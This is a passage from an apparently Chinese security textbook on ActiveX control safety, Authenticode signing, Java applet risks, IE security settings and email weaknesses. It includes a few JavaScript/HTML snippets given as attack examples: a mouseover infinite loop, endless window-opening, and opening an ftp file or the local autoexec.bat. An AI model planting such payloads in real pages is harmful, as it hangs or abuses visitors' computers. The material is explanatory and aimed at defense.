就變成了格式化C盤(非常危險(xiǎn)，不要試圖這樣做)。漏洞影響的系統(tǒng)包括：MicrosoftWindows9x、MicrosoftWindowsNT/2000等系統(tǒng)。3.開發(fā)、發(fā)行ActiveX控件的安全與管理ActiveX安全設(shè)置用于確保ActiveX控件安全地與用戶的計(jì)算機(jī)和計(jì)算機(jī)數(shù)據(jù)進(jìn)行交互。當(dāng)為Internet部件下載發(fā)布ActiveX控件時(shí)，必須為控件設(shè)置安全級(jí)別。否則，如果簽名的控件發(fā)行后損壞了用戶的計(jì)算機(jī)或破壞了用戶的數(shù)據(jù)，開發(fā)者將對此負(fù)法律責(zé)任。這些問題可以通過驗(yàn)證代碼的安全性并作出相應(yīng)的標(biāo)記來解決。Internet部件下載有兩級(jí)安全：設(shè)置初始化安全性和設(shè)置腳本安全性(注意：安全設(shè)置只適用于用InternetExplorer進(jìn)行下載的部件)。(1)設(shè)置初始化安全性當(dāng)將控件標(biāo)記為設(shè)置初始化安全性后，就確保了無論在初始化時(shí)使用什么數(shù)據(jù)和腳本，都不會(huì)執(zhí)行有損于最終用戶計(jì)算機(jī)的操作。一個(gè)設(shè)置了初始化安全性的控件不會(huì)寫入或修改任何Windows注冊條目、.ini文件或作為初始化參數(shù)結(jié)果的數(shù)據(jù)文件。設(shè)置初始化安全性對控件的方法、運(yùn)行時(shí)的屬性或提供給腳本書寫器的信息的安全性沒有要求。在默認(rèn)情況下，InternetExplorer將顯示一條警告信息，并且不下載沒有標(biāo)記為設(shè)置腳本安全性和設(shè)置初始化安全性的控件。在使用VisualBasic打包和展開向?qū)镮nternet發(fā)行的軟件打包時(shí)，可以將軟件指定為設(shè)置初始化安全性和設(shè)置腳本安全性。(2)設(shè)置腳本安全性當(dāng)將控件標(biāo)記為設(shè)置腳本安全性時(shí)，就確保了沒有任何腳本可以使控件對用戶的計(jì)算機(jī)或數(shù)據(jù)造成破壞。標(biāo)記為設(shè)置腳本安全性的控件將不能從用戶的計(jì)算機(jī)中獲取未授權(quán)的信息，也不能對系統(tǒng)造成破壞。在將控件標(biāo)記為設(shè)置腳本安全性之前，必須驗(yàn)證該控件不執(zhí)行任何非法行為或不允許可能造成破壞的打開文件的行為。一般來說，能夠自動(dòng)獲得用戶計(jì)算機(jī)中有關(guān)用戶的任何信息并將其展示給腳本書寫器的控件是沒有設(shè)置腳本安全性的。這種看似無害的行為在某些國家和地區(qū)會(huì)被視為犯罪特別地，控件的腳本不應(yīng)執(zhí)行以下操作：插入或檢索自定義、腳本的注冊表和.ini文件信息。換句話說就是用戶不能通過腳本來指定插入哪個(gè)注冊表或.ini文件信息。插入或檢索不屬于控件的注冊表和.ini文件信息。注意：控件在發(fā)行時(shí),可以插入和檢索預(yù)先定義只屬于控件的、用于幫助控件管理其內(nèi)部功能的注冊表和.ini文件信息。用腳本指定的名稱從硬盤驅(qū)動(dòng)器上讀取文件。安全與不安全操作之間的區(qū)別是非常細(xì)微的。例如，總是將信息寫入自己的注冊表?xiàng)l目的ActiveX控件可能是安全的，而允許用戶命名條目的控件是不安全的。創(chuàng)建臨時(shí)文件時(shí)不使用任何初始化或腳本值的控件可能是安全的，但允許初始化時(shí)或通過腳本對臨時(shí)文件命名的控件是不安全的。在將控件標(biāo)記為設(shè)置腳本安全性之前，建議最好創(chuàng)建文檔來記錄其理由，對此應(yīng)給予同簽訂法律合同一樣的關(guān)注?？梢詫⒃撐臋n包含在控件的.inf文件中。文檔可能包括以下內(nèi)容：①熟悉源代碼和VBScript的專家、外部開發(fā)者對控件的評(píng)論;②一張列出控件所有顯露的方法、事件和屬性的列表;③一張列出所有打開的文件、使用的API調(diào)用、檢索或?qū)懭氲男畔⒌牧斜?。如果在以上兩種列表的元素之間有任何依賴關(guān)系或數(shù)據(jù)傳送，則控件可能沒有設(shè)置腳本安全性。(3)安全標(biāo)志的局限性一個(gè)標(biāo)記為設(shè)置初始化安全性和設(shè)置腳本安全性的控件在使用時(shí)并不一定總是安全的。以上兩節(jié)列出了控件作為初始化或腳本的結(jié)果不能執(zhí)行的操作，但控件在其他時(shí)間仍可能執(zhí)行這些不安全操作。例如，假設(shè)創(chuàng)建了一個(gè)ActiveX控件，該控件在使用了10次以后就對硬盤進(jìn)行重新格式化。該操作并不作為初始化或腳本結(jié)果發(fā)生，因此可以將該控件標(biāo)記為安全。當(dāng)然，寫這樣一個(gè)控件的人應(yīng)受到與寫病毒的人同樣的懲罰。開發(fā)者，而不是最終用戶或HTML作者，應(yīng)當(dāng)負(fù)有提供足夠安全保證的責(zé)任。如果作為開發(fā)者沒有提供足夠的安全保證，那么他就應(yīng)承擔(dān)法律責(zé)任。軟件安全的最終審核一般是由對該安全問題非常熟悉且經(jīng)驗(yàn)豐富的開發(fā)人員對軟件獨(dú)立評(píng)審后完成的。開發(fā)者可能希望將有關(guān)評(píng)審的信息包含在下載文件包的.inf文件中。(4)實(shí)現(xiàn)數(shù)字簽名InternetExplorer的默認(rèn)安全設(shè)置要求任何可下載的軟件在下載之前必須擁有一個(gè)數(shù)字簽名。數(shù)字簽名能用于對以下內(nèi)容進(jìn)行核實(shí)。①核實(shí)文件的內(nèi)容文件有可靠的來源，簽名提供了一種驗(yàn)證文件內(nèi)容的方法，該方法確保該文件在可用于下載后未被改變過。數(shù)字簽名通過標(biāo)識(shí)創(chuàng)建軟件的合法實(shí)體來驗(yàn)證來源。當(dāng)在可下載的軟件中加入了簽名，發(fā)行者就是合法實(shí)體。合法實(shí)體應(yīng)該為簽名軟件被下載時(shí)或運(yùn)行后所造成的損失負(fù)責(zé)。②應(yīng)被簽名的軟件在Windows系統(tǒng)上，有5種類型的文件可以使用數(shù)字簽名：.exe文件、.cab文件、.dll文件、.ocx文件和.vbd文件。如果提供這些類型的文件下載，就應(yīng)為其設(shè)置數(shù)字簽名。注意:通常只要在部件打包后的.cab文件中進(jìn)行簽名就足夠了。然而，如果要發(fā)行的.ocx、.exe、.vbd或.dll文件沒有打包,在.cab文件中就要單獨(dú)為其進(jìn)行簽名?？梢酝ㄟ^向認(rèn)證機(jī)構(gòu)購買證書來獲得數(shù)字簽名。認(rèn)證機(jī)構(gòu)是一個(gè)確認(rèn)身份并發(fā)行認(rèn)證證書的公司。證書中包含發(fā)行者的數(shù)字簽名是發(fā)行者信用的驗(yàn)證。一旦出現(xiàn)問題，認(rèn)證機(jī)構(gòu)將成為發(fā)行者身份的見證人。在使用數(shù)字簽名時(shí)要使用Authenticode技術(shù)。Authenticode的目的是通過建立責(zé)任制來阻止有害代碼的發(fā)行。Authenticode將驗(yàn)證發(fā)布代碼的發(fā)行人的身份給要下載這份代碼的Internet最終用戶。此外，Authenticode可以為用戶確保該代碼在簽名后未被改動(dòng)。Authenticode技術(shù)來源于公開密鑰簽名技術(shù)，該技術(shù)使用了密鑰對來加密數(shù)據(jù)。密鑰對也用于文件的加密和解密。在公開密鑰技術(shù)中，公用密鑰和私用密鑰確保了文件的私有性。公用密鑰用于加密數(shù)據(jù)，而私用密鑰則用來解密數(shù)據(jù)。盡管該技術(shù)用于保護(hù)諸如電子郵件之類的小文件是很成功的，但是對于大文件，這一過程卻是非常消耗時(shí)間的。Authenticode正是這種技術(shù)的一種改進(jìn)形式，專供大文件使用。以下是Authenticode過程中的一些步驟：在開發(fā)者對文件簽名時(shí)，要計(jì)算一個(gè)哈希數(shù)。哈希數(shù)表示文件的總字節(jié)長度。一般可以選用不同的消息摘要技術(shù)，X.509標(biāo)準(zhǔn)要求至少提供MD5、SHA1。該數(shù)字用私用密鑰加密并插入到文件中。然后，開發(fā)者將文件進(jìn)行打包并將其部署到Web服務(wù)器上。當(dāng)用戶下載或安裝文件時(shí)，他們的計(jì)算機(jī)計(jì)算第二個(gè)哈希數(shù)，并同原先的進(jìn)行比較。如果數(shù)字相同，則文件的內(nèi)容就得到了驗(yàn)證。瀏覽器使用公用密鑰來決定軟件開發(fā)者的身份和提供數(shù)字簽名的認(rèn)證機(jī)構(gòu)。認(rèn)證機(jī)構(gòu)核實(shí)開發(fā)者的身份，并將包含經(jīng)私用密鑰加密的開發(fā)者名字的證書授予開發(fā)者。瀏覽器使用公用密鑰將文件解密。然后進(jìn)行安裝。4.IE瀏覽器的ActiveX的配置在IE中，也可以對ActiveX的使用進(jìn)行限制。具體步驟如下所示：(1)打開IE瀏覽器。(2)選擇“工具”萊單中的“Internet選項(xiàng)”命令；在打開的對話框中，選擇“安全”選項(xiàng)卡。(3)單擊選項(xiàng)卡上方白色編輯框中的Internet圖標(biāo)(地球標(biāo)志)，如圖8.1所示，代表要設(shè)置整個(gè)IE的安全設(shè)置。(4)單擊選項(xiàng)卡下方的“自定義級(jí)別”按鈕，出現(xiàn)安全設(shè)置對話框。(5)移動(dòng)對話框中的垂直滾動(dòng)滑塊，立到出現(xiàn)“ActiveX控件和插件”設(shè)置選項(xiàng)，如圖8.3所示。圖8.3中顯示了ActiveX的5個(gè)設(shè)置，具體內(nèi)容如下所示：圖8.3①“對標(biāo)記為可安全執(zhí)行腳本的ActiveX控件執(zhí)行腳本”這個(gè)設(shè)置是為標(biāo)記為安全執(zhí)行腳本的ActiveX控件執(zhí)行腳本設(shè)置執(zhí)行的策略。所謂“對標(biāo)記為可安全執(zhí)行腳本的ActiveX控件執(zhí)行腳本”，就是指具備有效的軟件發(fā)行商證書的軟件。該證書可說明是誰發(fā)行了該控件而且它沒有被篡改。知道了是誰發(fā)行的控件，用戶就可以決定是否信任該發(fā)行商。控件包含的代碼可能會(huì)意外或故意損壞你的文件。如果控件未簽名，那么用戶將無法知道是誰創(chuàng)建了它以及能否信任它。指定希望以何種方式處理具有潛在危險(xiǎn)的操作、文件、程序或下載內(nèi)容。請選擇下面的某項(xiàng)操作。如果希望在繼續(xù)之前給出請求批準(zhǔn)的提示，請單擊“提示”。如果希望不經(jīng)提示并自動(dòng)拒絕的操作或下載，請單擊“禁用”。如果希望不經(jīng)提示自動(dòng)繼續(xù)，請單擊“啟用”。②“對沒有標(biāo)記為安全的ActiveX控件進(jìn)行初始化和腳本化”這個(gè)設(shè)置是為沒有標(biāo)記為安全執(zhí)行腳本的ActiveX控件執(zhí)行腳本設(shè)置執(zhí)行的策略。IE默認(rèn)設(shè)置它為“禁用”，用戶最好不要改變它。③“下載未簽名的ActiveX控件”這個(gè)設(shè)置是為未簽名的ActiveX控件的下載提供策略。未簽名的意思和沒有標(biāo)記為安全執(zhí)行腳本的解釋是一樣的。IE默認(rèn)設(shè)置它為“禁用”，用戶最好不要改變它。④“下載已簽名的ActiveX控件”該設(shè)置是為已簽名的ActiveX控件的下載提供策略。默認(rèn)設(shè)計(jì)為“提示”，最好不要自行改變。⑤“運(yùn)行ActiveX控件和插件”這個(gè)設(shè)置是為了運(yùn)行ActiveX控件和插件的安全。這是最重要的設(shè)置，但許多站點(diǎn)上都使用ActiveX作為腳本語言，所以建議將它設(shè)置為“提示”。這樣當(dāng)有ActiveX運(yùn)行時(shí)，IE就會(huì)提醒用戶，用戶可以根據(jù)當(dāng)時(shí)所處的網(wǎng)站，決定是否使用它提供的ActiveX控件。例如，像訪問新浪這樣的網(wǎng)站，用戶當(dāng)然可以相信它，從而可以放心地運(yùn)行它提供的控件。8.2.3Java語言的使用與安全1.Java語言的特點(diǎn)對于一個(gè)經(jīng)常上網(wǎng)的用戶來說，使用Java語言是一件很平常的事，尤其是在聊天室中，網(wǎng)友們經(jīng)常用Java語言和其他人開玩笑。但是Java語言如果被黑客利用，也會(huì)造成很大的損失。Java語言的誕生對整個(gè)計(jì)算機(jī)產(chǎn)業(yè)發(fā)生深遠(yuǎn)的影響，對傳統(tǒng)的計(jì)算模型提出了新的挑戰(zhàn)。Java語言的特點(diǎn)：簡單、面向?qū)ο蟆⒎植际?、解釋?zhí)行、安全、體系結(jié)構(gòu)中立、可移植、高性能、多線程以及動(dòng)態(tài)性?，F(xiàn)將它的主要特點(diǎn)介紹如下：(1)安全性用于網(wǎng)絡(luò)、分布環(huán)境下的Java必須要防止病毒的入侵。Java不支持指針，一切對內(nèi)存的訪問都必須通過對象的實(shí)例變量來實(shí)現(xiàn)，這樣就防止程序員使用“特洛伊”木馬等欺騙手段訪問對象的私有成員，同時(shí)也避免了指針操作中容易產(chǎn)生的錯(cuò)誤，這樣黑客就無法通過網(wǎng)頁中對Java進(jìn)行攻擊了(所說到的Java網(wǎng)頁進(jìn)攻，只是利用了瀏覽器或操作系統(tǒng)的漏洞，并不是Java本身的錯(cuò)誤)。(2)JavaAppletJava語言的特性使它可以最大限度地利用網(wǎng)絡(luò)。Applet是Java的小應(yīng)用程序，它是動(dòng)態(tài)、安全、跨平臺(tái)的網(wǎng)絡(luò)應(yīng)用程序。JavaApplet嵌入HIML語言，通過主頁發(fā)布到Internet。當(dāng)網(wǎng)絡(luò)用戶訪問服務(wù)器的Applet時(shí)，這些Applet在網(wǎng)絡(luò)上進(jìn)行傳輸，然后在支持Java的瀏覽器中運(yùn)行。由于Java語言的機(jī)制，用戶一旦載入Applet，就可以生成多媒體的用戶界面或完成復(fù)雜的應(yīng)用。(3)Java是一種與平臺(tái)無關(guān)語言Java程序編譯后，并不真正生成可執(zhí)行代碼，而是生成字節(jié)代碼，使用時(shí)運(yùn)行在Java虛擬計(jì)算機(jī)(實(shí)際上是一個(gè)解釋器)上。所以，一個(gè)操作系統(tǒng)平臺(tái)只要提供Java虛擬計(jì)算機(jī)，Java程序就可以在上面運(yùn)行。從理論上講，Java程序可以運(yùn)行在所有的操作系統(tǒng)平臺(tái)上，從根本上解決了Internet的異構(gòu)問題。同時(shí)這也說明了Java程序可以在任何一個(gè)操作系統(tǒng)中運(yùn)行，如果黑客使用它，就可以在計(jì)算機(jī)世界中通行無阻了。由于Java可在多種操作系統(tǒng)平臺(tái)上運(yùn)行，因此惡意的Applet只要在其中一種操作系統(tǒng)(例如SolarisUNIX)上攻擊成功，在攻擊其他操作系統(tǒng)(例如Windows2000)時(shí)也能得逞。因此，Java在帶來應(yīng)用程序跨平臺(tái)執(zhí)行的同時(shí)，也帶來了惡意Applet的這種跨平臺(tái)攻擊的可能性。(4)Java可以和HTML無縫集成Java語言可以把靜態(tài)的超文本文件變成可執(zhí)行的應(yīng)用程序，極大地增強(qiáng)了超文本的可交互操作性。因此，有些黑客將Java小程序加入在網(wǎng)頁中，但是一般用戶看不到也察覺不到。在用戶瀏覽網(wǎng)頁時(shí)，這些黑客的Java攻擊程序就已經(jīng)侵入到用戶的計(jì)算機(jī)中去了。所以在網(wǎng)絡(luò)上，不要隨便訪問信用度不高的站點(diǎn)，以防止黑客的入侵。2.Java攻擊原理Java在給人們帶來好處的同時(shí)，也帶來了潛在的安全隱患。它使JavaApplet的設(shè)計(jì)者有機(jī)會(huì)入侵他人的計(jì)算機(jī)。實(shí)事求是地講，這個(gè)世界上沒有一個(gè)計(jì)算機(jī)系統(tǒng)是百分之百安全的，但由于現(xiàn)在Internet和Java在全球應(yīng)用得越來越普及，因此人們在瀏覽Web頁面的同時(shí)也會(huì)同時(shí)下載大量的JavaApplet，這就使得Web用戶的計(jì)算機(jī)面臨的安全威脅比以往任何時(shí)候都要大。(1)Java可以更改系統(tǒng)像Java這樣功能強(qiáng)大的程序語言，不管是在計(jì)算機(jī)的硬盤上還是在文件系統(tǒng)中，都具有修改數(shù)據(jù)的能力。在Java語言中包含有許多預(yù)先定義好的類(class)，其中的方法(method)可以刪除或修改文件、更改使用中的磁盤內(nèi)容、殺掉執(zhí)行程序或其執(zhí)行線程(thread)，這些功能很有可能會(huì)被Applet的設(shè)計(jì)者濫用。更改系統(tǒng)可能是所有潛在危險(xiǎn)中最嚴(yán)重的一種。所謂的更改系統(tǒng)包括入侵系統(tǒng)，在不安全地使用Java時(shí)，可能會(huì)被Applet發(fā)現(xiàn)攻擊的路徑。由于黑客們總是想方設(shè)法利用各種手段入侵他人的計(jì)算機(jī)系統(tǒng)(取得進(jìn)入系統(tǒng)的使用權(quán)限)，而用戶能做的不過是小心使用Java而己。因此，保證Java運(yùn)行環(huán)境安全最主要的還是Java設(shè)計(jì)者的責(zé)任，Java設(shè)計(jì)者必須保證在用戶下載Applet時(shí)沒有其他進(jìn)入系統(tǒng)的安全漏洞產(chǎn)生。在如今各種重要的計(jì)算機(jī)系統(tǒng)中，這種更改系統(tǒng)型的Applet攻擊對數(shù)據(jù)造成的破壞是非常嚴(yán)重的。如它可能會(huì)破壞一些表面上看來很安全的數(shù)據(jù)庫中的財(cái)務(wù)記錄，導(dǎo)致公司財(cái)務(wù)損失而破產(chǎn)或者是竄改醫(yī)院中病人的病情數(shù)據(jù)，導(dǎo)致醫(yī)療不當(dāng)，甚至因此導(dǎo)致病人死亡。所以在目前未能得到解決方案的情況下，對JavaApplet的使用要非常小心，不要讓重要的數(shù)據(jù)系統(tǒng)暴露在這種新型的攻擊危險(xiǎn)中。Internet這種全球最開放的系統(tǒng)幾乎可以稱得上是計(jì)算機(jī)黑客們的樂園，這從Internet上層出不窮的入侵事件便不難看出。因此，如何使Java不至于成為他們的破壞工具，不管是對開發(fā)員來講還是對用戶來講都是一個(gè)重要的課題。(2)獲得用戶的隱蔽數(shù)據(jù)這種類型的攻擊，就是黑客利用Java的漏洞暴露用戶計(jì)算機(jī)上的秘密數(shù)據(jù)。例如，在UNIX系統(tǒng)中如能訪問安全賬戶/etc/passwd文件，就有可能入侵整個(gè)系統(tǒng)。另外，計(jì)算機(jī)系統(tǒng)也可能會(huì)造成一些敏感性資料的泄露，例如心術(shù)不正的公司可以利用商業(yè)間諜偷取對手公司的業(yè)務(wù)計(jì)劃。個(gè)人用戶對于其私人的電子郵件或財(cái)務(wù)記錄是否可以公開也要慎重考慮，任何可經(jīng)由電子郵件傳送或經(jīng)由網(wǎng)絡(luò)傳遞的秘密資料，都有可能受到入侵。利用Java的功能，會(huì)產(chǎn)生雙重偽造的可能性，典型的電子郵件偽造(mailforging)的情況會(huì)更加嚴(yán)重。如可以利用JavaApplet以先使系統(tǒng)送出假信息，以欺騙真的郵件。Java對于某些形式的網(wǎng)絡(luò)攻擊可以成功地進(jìn)行防衛(wèi)，例如，文件系統(tǒng)的輸入輸出操作就受到嚴(yán)格的控制。但是，這又與Applet常需要一條通道以便傳回?cái)?shù)據(jù)的要求相違背，因?yàn)锳pplet總是必須與原來的服務(wù)器一直相連。對電子郵件的偽造，防衛(wèi)起來則比較困難。由于缺乏對客戶端連接接口的限制功能，電子郵件的偽造不太可能杜絕。(3)敵對行為還有一種類型的Applet攻擊，只是造成使用者的困擾，雖然與以上攻擊相比危險(xiǎn)性要小得多，但也值得引起重視。例如，故意發(fā)出不經(jīng)意的聲音或在屏幕上顯示不雅觀的畫面等。另外，單純的程序設(shè)計(jì)錯(cuò)誤而引起的一些不良后果也屬于此類。正如前面所講的，某些類型的拒絕系統(tǒng)服務(wù)式攻擊，也可以歸類為單純的敵對行為。例如，產(chǎn)生眾多窗口的操作，可能只是令人困擾而己，并不會(huì)破壞系統(tǒng)的數(shù)據(jù)。3.在IE中設(shè)置Java的安全性要想安全地使用IE瀏覽器訪問Internet并杜絕Java惡意地攻擊，就必須首先了解使用Java的攻擊方式，然后才能掌握防范Java攻擊的方法。這里，就不介紹Java語言了，有興趣的用戶可以閱讀專門的書籍。建議大家還是要學(xué)習(xí)一下Java的基本知識(shí)，因?yàn)橄旅娴膶?shí)例都和Java的腳本語言JavaScript相關(guān)。(1)用JAVASCRIPT發(fā)個(gè)死循環(huán)給訪問者如果在文本中輸入如下的代碼，那么當(dāng)鼠標(biāo)移動(dòng)到這個(gè)連接設(shè)置時(shí)，JavaScript就會(huì)產(chǎn)生一個(gè)死循環(huán)，使訪問者的計(jì)算機(jī)無法響應(yīng)其他的程序，就好像死機(jī)了一樣。<ahref=://OnMouseOver″while(100){window.close('/')}″>測試鏈接</a>或用<aherf=″″OnMouseOver″while(true){(window.close('/'))″>測試鏈接</a>(2)可以使用戶打開指定的窗口<imgsrc＝“Javascript;n＝1;do{window.open('://用戶要打開的連接')}while(n==2)″Width=″1″>同樣的道理，通過以下的代碼，訪問者將“莫名其妙”地打開無數(shù)個(gè)新的窗口!<imgsrc=″Javascript:n=1;do{window.open('://用戶要打開的連接')}while(n==1)″Width=″1″>(3)可以將網(wǎng)上的某個(gè)文件傳送給對方這個(gè)程序如果嵌到頁面中，它就會(huì)無聲無息地運(yùn)行，用戶絲毫不會(huì)察覺，如果傳輸?shù)奈募且粋€(gè)特洛伊木馬或者病毒，那么后果可想而知。<imgsrc=″Javascript:n=1;do{window.open('ftp://用戶要傳的文件')}while(n==1)″Width=″1″>(4)可以使訪問者打開自己的文件前提條件是在訪問者的硬盤上有.bat類型的文件(如autoexec.bat)。這個(gè)方法很具危險(xiǎn)性，結(jié)合到第3種方法，如果黑客已經(jīng)在用戶的計(jì)算機(jī)上安裝了特洛伊木馬，他就可以通過這個(gè)方式啟動(dòng)木馬，這個(gè)危險(xiǎn)性就不要多說了。<imgsrc=″Javascript:n=1;do{window.open('file://c:/autoexec.bat')}while(n==2)″Width=″1″>以上列出的還只是JavaScript進(jìn)攻實(shí)例中很少的一部分，相信用戶已經(jīng)深切地感受到了其巨大的威脅性。下面來看看如何在IE瀏覽器中配置Java的安全。IE對Java的使用也可以進(jìn)行限制。具體實(shí)施的步驟如下：(1)打開IE瀏覽器，選擇“工具”菜單中的“Internet選項(xiàng)”命令。(2)在所打開的對話框中，選擇“安全”選項(xiàng)卡，如圖8.1所示。(3)單擊選項(xiàng)卡上方白色編輯框中的Internet圖標(biāo)(地球標(biāo)志)，代表要設(shè)置整個(gè)IE的安全設(shè)置。(4)單擊選項(xiàng)卡下方的“自定義級(jí)別”按鈕，打開“安全設(shè)置”對括框。(5)移動(dòng)對話框的垂直滾動(dòng)滑塊，直到出現(xiàn)“Java安全權(quán)限”設(shè)置，如圖8.4所示。從圖中可以看到一共包含4個(gè)Java的安全設(shè)置，其中：①Java權(quán)限是Java程序?qū)Ρ镜赜?jì)算機(jī)操作的權(quán)限，共分為“高”、“中”、“低”、“禁用”4級(jí)，IE默認(rèn)設(shè)置是“中”級(jí)，用戶可以將它設(shè)為“高”。“自定義”設(shè)置是用戶自己定義Java的各個(gè)操作的權(quán)限，這是給高級(jí)用戶使用的，一般用戶可以不使用它。②Java小程序腳本是對JavaApplet程序設(shè)置的，許多網(wǎng)站上都使用JavaApplet作為與用戶交互的腳本語言，所以IE對它的默認(rèn)設(shè)置為“啟用”。如果用戶將它設(shè)為“禁用”，將會(huì)失去許多網(wǎng)站的功能支持，用戶可以自己考慮。③活動(dòng)腳本是否允許瀏覽器使用JavaScript語言進(jìn)行網(wǎng)頁的顯示，同樣許多網(wǎng)站上都使用Java作為與用戶交互的腳本語言，所以IE對它的默認(rèn)設(shè)置為“啟用”。如果用戶是在聊天室，就可以將這個(gè)功能設(shè)為“禁止”，以防止上面講述的各種攻擊。圖8.4④允許腳本進(jìn)行粘貼操作這個(gè)功能具有一定的危險(xiǎn)性，但是它在E-mail、表單的操作和信息的提交中都發(fā)揮著重要的作用。用戶在不需要時(shí)，可以關(guān)閉這個(gè)功能。此外，在“高級(jí)”面板中，還有一項(xiàng)Java安全的設(shè)置，如圖8.5所示。在“MicrosoftVM”可以選擇“啟用Java記錄”，這個(gè)功能是指定InternetExplorer是否應(yīng)該創(chuàng)建所有Java程序活動(dòng)的日志，這有利于安全性和疑難解答。圖8.58.3電子郵件與OutlookExpress的安全E-mail的功能強(qiáng)大，它不僅能夠傳輸文字、圖像、聲音，還能夠傳輸計(jì)算機(jī)程序，并且配合專用的軟件運(yùn)用語言和動(dòng)態(tài)圖像，使郵件有聲有色；同時(shí)它傳輸快，價(jià)格低。在Web上，應(yīng)用E-mail可以方便地訪問一個(gè)Web網(wǎng)頁，并向管理員發(fā)送E-mail，給人們的生活帶來了方便和快捷。然而E-mail十分脆弱，從瀏覽器向Internet上的另一用戶發(fā)送E-mail時(shí)，不僅信件像明信片一樣是公開的，而且也無法知道在到達(dá)其最終目的之前，信件經(jīng)過了多少機(jī)器。Internet像一個(gè)蜘蛛網(wǎng)，E-mail到達(dá)收件人之前，會(huì)經(jīng)過大學(xué)、政府機(jī)構(gòu)和服務(wù)提供商。因?yàn)猷]件服務(wù)器可接收來自任意地點(diǎn)的任意數(shù)據(jù)，所以任何人只要可以訪問這些服務(wù)器或訪問E-mail經(jīng)過的路徑，就可以閱讀這些信息。惟一的安全性取決于人們對郵件有多大興趣。當(dāng)然，在整個(gè)過程中，具備多少閱讀這些信件的技術(shù)，了解多少訪問服務(wù)器的方法，會(huì)產(chǎn)生不同的結(jié)果。8.3.1E-mail工作原理及安全漏洞1.E-mail工作原理一個(gè)郵件系統(tǒng)的傳輸包含了用戶代理(useragent)、傳輸代理(transferagent)及接受代理(deliveryagent)等3大部分。用戶代理是一個(gè)用戶端發(fā)信和收信的程序，負(fù)責(zé)將信按照一定的標(biāo)準(zhǔn)包裝，然后送至郵件服務(wù)器，將信件發(fā)出或由郵件服務(wù)器收回。傳輸代理則負(fù)責(zé)信件的交換和傳輸，將信件傳送至適當(dāng)?shù)泥]件主機(jī)，再由接受代理將信件分發(fā)至不同的郵件信箱。傳輸代理必須要能夠接受用戶郵件程序送來的信件，解讀收信人的地址，根據(jù)SMTP(simplemailtransportprotocol)協(xié)議或者因特網(wǎng)郵件擴(kuò)展MIME(multipurposeinternetmailextensions)標(biāo)準(zhǔn)將它正確無誤地傳遞到目的地?，F(xiàn)在一般的傳輸代理已采用Sendmail程序完成工作，郵件主機(jī)在經(jīng)接收代理POP(postofficeprotocol，網(wǎng)絡(luò)郵局協(xié)議或網(wǎng)絡(luò)中轉(zhuǎn)協(xié)議)來使郵件被用戶讀取。2.E-mail的安全風(fēng)險(xiǎn)(1)E-mail的漏洞當(dāng)用戶之間或用戶與站點(diǎn)交換E-mail時(shí)，應(yīng)確保他們是安全的。E-mail在Internet上傳送時(shí)，會(huì)經(jīng)過很多點(diǎn)，如果中途沒有什么阻止它，最終會(huì)到達(dá)目的地。信息在傳送過程中通常會(huì)做幾次短暫停留，因?yàn)槠渌腅-mail服務(wù)器會(huì)查看信頭，以確定該信息是否發(fā)給自己，如果不是，服務(wù)器會(huì)將其轉(zhuǎn)送到下一個(gè)最可能的地址。E-mail服務(wù)器有一個(gè)“路由表”，在那里列出了其他E-mail服務(wù)器的目的地址。當(dāng)服務(wù)器讀完信頭，意識(shí)到信息不是發(fā)給自己時(shí)，它會(huì)迅速將信息送到目的地服務(wù)器或離目的地最近的服務(wù)器。E-mail服務(wù)器向全球開放，很容易受到黑客的襲擊，從而暴露隱私。信息可能攜帶會(huì)損害服務(wù)器的指令。例如，Morrosbug內(nèi)有一種會(huì)損壞Sendmail的指令，這個(gè)指令可使其執(zhí)行黑客發(fā)出的命令。Web提供的閱讀器更容易受到這類侵?jǐn)_。因?yàn)?，與標(biāo)準(zhǔn)的基于文本的Internet郵件不同，Web上的圖形接口需要執(zhí)行腳本或applet才能顯示信息。例如，在一條信息中加進(jìn)了一個(gè)小的腳本，并發(fā)給公司內(nèi)的每一個(gè)用戶。這個(gè)腳本在信息中作為一個(gè)小圖標(biāo)，下面有“Clickme”。因?yàn)樗麃碜杂贛IS，組織內(nèi)的每一個(gè)人都知道它，人們一擊這個(gè)圖像，就會(huì)打開一個(gè)小程序，重新映射(map)驅(qū)動(dòng)器，并安裝想要發(fā)布的應(yīng)用程序。這個(gè)步驟在很多組織中采用，但可能有人欺騙郵件記錄，改變信件頭，將同樣的信息發(fā)出，但與信息中攜帶的圖標(biāo)相聯(lián)系的腳本卻發(fā)生了改變。因?yàn)橛脩粢詾樾畔⑹菑腗IS發(fā)出的，他們會(huì)敲擊圖標(biāo)。圖標(biāo)攜帶的指令，會(huì)刪去他們的本地硬盤驅(qū)動(dòng)器，上載某個(gè)文件甚至系統(tǒng)信息，這個(gè)信息甚至可以不包括圖標(biāo)。他可以要求用戶改變口令，用戶可能因?yàn)樾畔碜訫IS而真的改變口令。防火墻也不可能識(shí)別所有惡意的applet和腳本。最多只能濾去郵件地址中有風(fēng)險(xiǎn)的字符，這些字符還應(yīng)是防火墻識(shí)別得出來的。(2)匿名轉(zhuǎn)發(fā)在正常的情況下，發(fā)送電子郵件會(huì)盡量將發(fā)送者的名字和地址包括進(jìn)郵件的附加信息中。但有時(shí)候發(fā)送者希望將郵件發(fā)送出去，而不希望收件者知道是誰發(fā)的。這種發(fā)送郵件的方法被稱為匿名郵件。實(shí)現(xiàn)匿名的一種最簡單的發(fā)法是簡單地改變電子郵件軟件里發(fā)送者的名字。但這是一種表面現(xiàn)象，因?yàn)橥ㄟ^信息表頭中的其他信息，仍能夠跟蹤發(fā)送者。而讓發(fā)送者的地址完全不出現(xiàn)在郵件中的惟一的方法是讓其他人發(fā)送這個(gè)郵件，郵件中的發(fā)信地址就變成了轉(zhuǎn)發(fā)者的地址了?，F(xiàn)在Internet網(wǎng)上有大量的匿名轉(zhuǎn)發(fā)者(或稱為匿名服務(wù)器)，發(fā)送者將郵件發(fā)送給匿名轉(zhuǎn)發(fā)者，并告訴這個(gè)郵件希望發(fā)送給誰。該匿名轉(zhuǎn)發(fā)者刪去所有的返回地址信息，再郵發(fā)給真正的收件者，并將自己的地址作為返回地址插入郵件中。有人認(rèn)為，使用匿名轉(zhuǎn)發(fā)的動(dòng)機(jī)是可疑的，發(fā)送的可能是非法的、恐怖的、不健康的信息。實(shí)際上并不盡然。匿名轉(zhuǎn)發(fā)有一些重要的合法使用。例如，一些膽怯的人可以參加某種心理方面的討論組，可以就一些難以啟齒的問題向?qū)＜易稍?。從安全的角度考慮，匿名轉(zhuǎn)發(fā)也是會(huì)有用的。例如發(fā)送敏感信息，隱藏發(fā)送者的信息可以使窺竊者不知道這一信息是否有用。(3)利用E-mail詐騙E-mail詐騙是Internet上